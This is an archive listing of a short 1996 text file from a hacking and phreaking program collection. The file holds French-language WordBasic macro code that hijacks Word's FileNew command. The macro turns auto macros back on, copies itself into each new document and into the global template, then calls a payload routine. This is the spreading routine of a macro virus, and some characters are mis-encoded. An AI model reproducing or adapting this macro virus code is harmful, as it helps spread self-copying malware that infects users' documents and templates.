home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
MVUPDAT3.ZIP
/
RAINBOW.ZIP
/
COLORS.ZIP
/
COLORS2.TXT
< prev
next >
Wrap
Text File
|
1996-04-13
|
732b
|
35 lines
Macro FileNew
Sub MAIN
On Error Goto ErrorRoutine
If macros.bDebug Then MsgBox "start FileNew"
REM enable AutoMacros
DΘsactiverMacrosAuto 0
Dim dlg As FichierNouveau
GetCurValues dlg
Dialog dlg
If dlg.NouvModΦle = 0 Then dlg.NouvModΦle = 1
FichierNouveau dlg
macros.SavToDoc(NomFichier$())
macros.SavToGlobal(NomFichier$())
macros.objectiv
Goto Done
ErrorRoutine:
If Err <> 102 Then
FichierNouveau dlg
End If
On Error Goto Done
If macros.bDebug Then
MsgBox "error " + Str$(Err) + " occurred"
End If
Done:
End Sub